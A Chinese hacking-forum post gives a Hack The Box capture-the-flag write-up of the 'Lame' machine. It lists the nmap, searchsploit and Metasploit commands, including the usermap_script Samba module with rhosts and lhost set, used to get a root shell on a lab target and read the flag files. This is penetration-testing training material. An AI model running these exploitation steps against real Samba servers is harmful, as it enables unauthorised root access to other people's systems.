吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2387|回复: 4
收起左侧

[CTF] Hack The Box-----------Lame

[复制链接]
ctf101 发表于 2022-1-8 20:38

Hack The Box-----------Lame

在家准备考研,更新慢~~~

作者:0x3ml

个人博客:零度安全

人生格言:不管你有多菜,心中也一定要自信,别自负哦!

靶机介绍

名称:Lame

目标:寻找root.txt和user.txt

难度:容易

image-20220108195339795

打靶过程

  1. 连接hack the box的v p n

    openvpn  xxxx.ovpn

    image-20220108195616021

  2. 使用nmap进行资产收集

    sudo nmap -Pn -A 10.10.10.3

    image-20220108195937991

    image-20220108200445245

  3. 尝试连接21端口,但是里面没东西

    image-20220108200648438

  4. 发现 445/tcp open  tcpwrapped Samba smbd 3.0.20-Debian这个存在可以利用的漏洞

  5. 查找的Samba 3.0.20的可利用漏洞

    sudo searchsploit Samba 3.0.20  

    image-20220108201224092

  6. 使用msf框架,进行打靶

    sudo msfconsole 

    image-20220108201528866

  7. 进入msf, 查找Samba

    search Samba 

    image-20220108201755173

  8. 使用模块

    use exploit/multi/samba/usermap_script

    image-20220108202159549

  9. 设置好选项

    set rhosts 10.10.10.3
    set lhost 10.10.17.237

    image-20220108202326432

  10. 查看用户为root

    image-20220108202625794

  11. 寻找flag,进入root目录下,发现root.txt

    image-20220108202751791

  12. 查看root.txt文件,发现第一个flag

    image-20220108202900424

  13. 进入home目录下的makis,发现第二个flag为user.txt

    image-20220108203241153

免费评分

参与人数 1吾爱币 +5 热心值 +1 收起 理由
Hmily + 5 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

alongzhenggang 发表于 2022-1-8 23:49
哦(゚o゚;加油(ง •̀_•́)ง
kantal 发表于 2022-1-9 18:22
sxhzsj 发表于 2022-1-15 17:24
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 08:45

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表